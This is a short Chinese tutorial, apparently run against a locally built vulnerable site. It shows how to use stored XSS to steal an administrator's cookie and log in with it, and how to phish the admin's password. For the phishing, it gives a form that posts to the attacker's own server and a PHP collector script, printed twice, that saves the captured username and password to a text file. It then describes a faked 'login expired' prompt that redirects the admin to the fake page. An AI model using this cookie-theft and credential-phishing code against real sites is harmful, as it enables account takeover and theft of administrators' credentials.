本地搭建一个带有xss漏洞源码 插入js代码简单弹个窗
在xss平台创建项目
将xss平台的payload丢进筐里管理员登陆就可以盗取cookie加登陆
成功拿到cookie并且利用cookie登陆后台
xss钓鱼
通过伪造登陆页面来诱惑管理员上钩右键下载网页的html
打开html添加from表单
<form action="http://你服务器的地址/add.php" method="post" id="loginFcaFrom">
这段代码创建了一个POST方法的表单,将用户输入的数据提交到"http://xxxxz/add.php"这个目标URL,并使用ID "loginFcaFrom" 作为表单的唯一标识。
编写add.php来接受输入的密码
<?php
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];
$all = "$user \n $pwd";
$f = fopen("context.txt",'w');
fwrite($f,"admin_name:$user \n admin_possword:$pwd");
?>
<?php
// 从POST请求中获取管理员用户名和密码
$user = $_POST['admin_name'];
$pwd = $_POST['admin_password'];// 将用户名和密码拼接成字符串
$all = "$user \n $pwd";// 打开名为"context.txt"的文件,以写入模式
$f = fopen("context.txt", 'w');// 向context.txt中写入管理员用户名和密码信息
fwrite($f, "admin_name:$user \n admin_password:$pwd");
?>
现在只需要在自己服务器搭建这个项目 然后利用xss在那登陆后台之后伪造登陆已过期 然后点击跳转到我们的钓鱼页面就可以了
xss平台创建此项目 放进刚刚的筐里提交
我们模拟管理员登陆到后台然后就自动提示登陆过期 点击一下就跳转到我们的钓鱼页面
我们输入账号密码后我们的txt就自动接收到了账号密码
管理员的账号密码就可以被我们钓出来了